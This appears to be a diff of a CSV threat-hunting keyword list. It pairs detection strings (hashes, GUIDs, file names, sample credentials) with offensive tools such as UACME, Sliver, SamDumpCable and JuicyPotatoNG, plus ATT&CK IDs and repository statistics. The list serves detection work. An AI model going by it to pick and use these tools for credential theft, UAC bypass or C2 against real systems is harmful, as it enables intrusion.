tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*1617117C-0E94-4E6A-922C-836D616EC1F5*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","9","3","296","75","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" -"*16726c4330d7db5d56a5a11503314533b170783441c3f8282b66f126295a289e*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*175c9fc0c7046d006a6db698144fab3b40bd191e15617e7fba417a466c3a0b6f*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*1337OMGsam*","offensive_tool_keyword","SamDumpCable","Dump users sam and system hive and exfiltrate them","T1003.002 - T1564.001","TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/SamDumpCable","1","0","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*1337OMGsys*","offensive_tool_keyword","SamDumpCable","Dump users sam and system hive and exfiltrate them","T1003.002 - T1564.001","TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/SamDumpCable","1","0","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*133f71bd8d6d4ca80a9a542c2492ba9a65e05b0cfa681a85dd05d9cf998a1bb4*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*1424fde08d6994062fc8a795ff8d80d30060c4991103c4af59228dcf60171eca*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*1617117C-0E94-4E6A-922C-836D616EC1F5*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" +"*16726c4330d7db5d56a5a11503314533b170783441c3f8282b66f126295a289e*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*175c9fc0c7046d006a6db698144fab3b40bd191e15617e7fba417a466c3a0b6f*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*192.168.0.110:1234*","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","1","N/A","10","10","31","17","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" "*192.168.1.229 Passw0rd!*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","0","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" -"*1939a69f717d4baa13d558c11e1fc7dee1e8ce8fcc5f0fe0dea11845e22ce4c8*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*195a6712e204e1d01dc1d36b9d43a2a477b0833019294b37512d8baaa98e524e*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*1939a69f717d4baa13d558c11e1fc7dee1e8ce8fcc5f0fe0dea11845e22ce4c8*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*195a6712e204e1d01dc1d36b9d43a2a477b0833019294b37512d8baaa98e524e*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*1a279f5df4103743b823ec2a6a08436fdf63fe30*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" -"*1BACEDDC-CD87-41DC-948C-1C12F960BECB*","offensive_tool_keyword","themebleed","Proof-of-Concept for CVE-2023-38146","T1566.001 - T1077 - T1213.002","TA0007 - TA0011 - TA0010","N/A","N/A","Exploitation tools","https://github.com/gabe-k/themebleed","1","0","N/A","10","2","143","27","2023-09-13T04:50:29Z","2023-09-13T04:00:14Z" +"*1BACEDDC-CD87-41DC-948C-1C12F960BECB*","offensive_tool_keyword","themebleed","Proof-of-Concept for CVE-2023-38146","T1566.001 - T1077 - T1213.002","TA0007 - TA0011 - TA0010","N/A","N/A","Exploitation tools","https://github.com/gabe-k/themebleed","1","0","N/A","10","2","143","28","2023-09-13T04:50:29Z","2023-09-13T04:00:14Z" "*1c50adeb-53ac-41b9-9c34-7045cffbae45*","offensive_tool_keyword","o365enum","Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.","T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002","TA0040 - TA0010 - TA0007","N/A","N/A","Exploitation tools","https://github.com/gremwell/o365enum","1","0","N/A","7","3","212","40","2021-04-23T14:40:52Z","2020-02-18T12:22:50Z" "*1C5EDA8C-D27F-44A4-A156-6F863477194D*","offensive_tool_keyword","ntdlll-unhooking-collection","unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless)","T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 - T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/ntdlll-unhooking-collection","1","0","N/A","9","2","152","34","2023-08-02T02:26:33Z","2023-02-07T16:54:15Z" "*1E70D62D-CC36-480F-82BB-E9593A759AF9*","offensive_tool_keyword","PowerShx","Run Powershell without software restrictions.","T1059.001 - T1055.001 - T1055.012","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/iomoath/PowerShx","1","0","N/A","7","3","267","46","2021-09-08T03:44:10Z","2021-09-06T18:32:45Z" "*1f047faec08d9a35c304fb4a7cf13853589359a8f7cbfdd48c5d5807712dcf05*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*1f047faec08d9a35c304fb4a7cf13853589359a8f7cbfdd48c5d5807712dcf05*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" -"*1f25c454ae331c582fbdb7af8a9839785a795b06a6649d92484b79565f7174ae*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" +"*1f25c454ae331c582fbdb7af8a9839785a795b06a6649d92484b79565f7174ae*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" "*1HeroYcNYMhjsq8RYCx1stSaRZnQd9B9Eq*","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","1","N/A","10","10","586","223","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z" "*1mil-AD-passwords.txt*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","1","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" -"*1N3/Sn1per*","offensive_tool_keyword","Sn1per","Automated Pentest Recon Scanner.","T1083 - T1087 - T1518","TA0001 - TA0002 - TA0003","N/A","N/A","Information Gathering","https://github.com/1N3/Sn1per","1","0","N/A","N/A","10","6901","1737","2023-09-29T22:14:24Z","2015-09-06T15:47:38Z" -"*1N73LL1G3NC3x/Nightmangle*","offensive_tool_keyword","Nightmangle","ightmangle is post-exploitation Telegram Command and Control (C2/C&C) Agent","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/1N73LL1G3NC3x/Nightmangle","1","1","N/A","10","10","72","10","2023-09-26T19:21:31Z","2023-09-26T18:25:23Z" -"*1password2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*1N3/Sn1per*","offensive_tool_keyword","Sn1per","Automated Pentest Recon Scanner.","T1083 - T1087 - T1518","TA0001 - TA0002 - TA0003","N/A","N/A","Information Gathering","https://github.com/1N3/Sn1per","1","0","N/A","N/A","10","6905","1738","2023-09-29T22:14:24Z","2015-09-06T15:47:38Z" +"*1N73LL1G3NC3x/Nightmangle*","offensive_tool_keyword","Nightmangle","ightmangle is post-exploitation Telegram Command and Control (C2/C&C) Agent","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/1N73LL1G3NC3x/Nightmangle","1","1","N/A","10","10","73","10","2023-09-26T19:21:31Z","2023-09-26T18:25:23Z" +"*1password2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*2_lyncbrute.sh*","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","N/A","4","323","68","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z" -"*207953846cc26417e163db3dc483a65e8e94bc9bd86c8928d59b078f1e72fcc7*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*210A3DB2-11E3-4BB4-BE7D-554935DCCA43*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*207953846cc26417e163db3dc483a65e8e94bc9bd86c8928d59b078f1e72fcc7*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*210A3DB2-11E3-4BB4-BE7D-554935DCCA43*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*21582b3a68e8753322a1b1c7e550ae7fd305de4935de68fbde9f87570f484d00*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*21582b3a68e8753322a1b1c7e550ae7fd305de4935de68fbde9f87570f484d00*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" -"*215a9f9095e89c79b342aed5625bbc6d660b910cd15a06ac4a072e8860c3e2c6*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*215a9f9095e89c79b342aed5625bbc6d660b910cd15a06ac4a072e8860c3e2c6*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*22A156EA-2623-45C7-8E50-E864D9FC44D3*","offensive_tool_keyword","SharpView","C# implementation of harmj0y's PowerView","T1018 - T1482 - T1087.002 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/tevora-threat/SharpView/","1","0","N/A","10","9","850","206","2021-12-17T15:53:20Z","2018-07-24T21:15:04Z" "*23975ac9-f51c-443a-8318-db006fd83100*","offensive_tool_keyword","o365enum","Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.","T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002","TA0040 - TA0010 - TA0007","N/A","N/A","Exploitation tools","https://github.com/gremwell/o365enum","1","0","N/A","7","3","212","40","2021-04-23T14:40:52Z","2020-02-18T12:22:50Z" -"*23A2E629-DC9D-46EA-8B5A-F1D60566EA09*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*23af06a7987966a7e51336b3cdd33b411fa05778ec14179a50a60fa0f6aee1af*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*23A2E629-DC9D-46EA-8B5A-F1D60566EA09*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*23af06a7987966a7e51336b3cdd33b411fa05778ec14179a50a60fa0f6aee1af*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*23E06BF12C5BE7641EF89F557C3F6600E1F3881F8DCE7279C2112279E7EC3B988E1A85EC350149007DE78CE5566FCBD18F630D2CDB78C76AA06F2B121F0B3701*","offensive_tool_keyword","combine_harvester","Rust in-memory dumper","T1055 - T1055.001 - T1055.012","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/m3f157O/combine_harvester","1","0","N/A","10","2","101","17","2023-07-26T07:16:00Z","2023-07-20T07:37:51Z" "*2419CEDC-BF3A-4D8D-98F7-6403415BEEA4*","offensive_tool_keyword","PipeViewer ","A tool that shows detailed information about named pipes in Windows","T1022.002 - T1056.002","TA0005 - TA0009","N/A","N/A","discovery","https://github.com/cyberark/PipeViewer","1","0","N/A","5","5","453","33","2023-08-23T09:34:06Z","2022-12-22T12:35:34Z" "*261f880e-4bee-428d-9f64-c29292002c19*","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","0","N/A","10","8","703","90","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z" -"*27159b8ff67d3f8e6c7fdb4b57b9f57f899bdfedf92cf10276269245c6f4e066*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*273987ab3fcc9a7e9976a73ff8c6986e6e397fc3b9f179ce23991814f694a843*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*27b89ba25c1620f7f46af4a239d6a18b71b9b689ea33eb7ab099e0b039cdf21f*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*282383cd8223cd0d36f4bf09501830ae1dd01aacaf483e9e95fa4938345453b7*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*27159b8ff67d3f8e6c7fdb4b57b9f57f899bdfedf92cf10276269245c6f4e066*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*273987ab3fcc9a7e9976a73ff8c6986e6e397fc3b9f179ce23991814f694a843*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*27b89ba25c1620f7f46af4a239d6a18b71b9b689ea33eb7ab099e0b039cdf21f*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*282383cd8223cd0d36f4bf09501830ae1dd01aacaf483e9e95fa4938345453b7*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*29446C11-A1A5-47F6-B418-0D699C6C3339*","offensive_tool_keyword","GithubC2","Github as C2","T1095 - T1071.001","TA0011","N/A","N/A","C2","https://github.com/TheD1rkMtr/GithubC2","1","0","N/A","10","10","115","29","2023-08-02T02:26:05Z","2023-02-15T00:50:59Z" "*2944dbfc-8a1e-4759-a8a2-e4568950601d*","offensive_tool_keyword","o365enum","Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.","T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002","TA0040 - TA0010 - TA0007","N/A","N/A","Exploitation tools","https://github.com/gremwell/o365enum","1","0","N/A","7","3","212","40","2021-04-23T14:40:52Z","2020-02-18T12:22:50Z" "*2963C954-7B1E-47F5-B4FA-2FC1F0D56AEA*","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","0","N/A","10","5","416","95","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" -"*2a08385892845104b4f07d693ca395eba3a09e4aa89ad791be3807919316ed67*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*2a63a2c3f43afb1f3fb091ffa71bd4d67b64e6d0b220e97057542883bce246f5*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*2a67c7690ec6df8e233207116b0e4fe76c02ae43595d9e606e123572b6ac88a1*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*2aa21c51a100de781b6647b04bb0371a6205a7b1dc22a3eeae058ec4cb80fd5f*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*2a08385892845104b4f07d693ca395eba3a09e4aa89ad791be3807919316ed67*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*2a63a2c3f43afb1f3fb091ffa71bd4d67b64e6d0b220e97057542883bce246f5*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*2a67c7690ec6df8e233207116b0e4fe76c02ae43595d9e606e123572b6ac88a1*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*2aa21c51a100de781b6647b04bb0371a6205a7b1dc22a3eeae058ec4cb80fd5f*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*2CFB9E9E-479D-4E23-9A8E-18C92E06B731*","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","0","N/A","9","3","257","42","2023-08-20T07:12:01Z","2023-07-30T09:25:38Z" "*2D863D7A-A369-419C-B4B3-54BDB88B5816*","offensive_tool_keyword","UsoDllLoader","This PoC shows a technique that can be used to weaponize privileged file write vulnerabilities on Windows. It provides an alternative to the DiagHub DLL loading exploit ","T1210.001 - T1055 - T1574.001","TA0007 - TA0002 - TA0001","N/A","N/A","Exploitation tools","https://github.com/itm4n/UsoDllLoader","1","0","N/A","N/A","4","368","104","2020-06-06T11:05:12Z","2019-08-01T17:58:16Z" -"*2e64396f0b5cc2f6e59f5d329ffbb1ef0e6dd5e0547bd6fff5567f72cca6ace9*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" 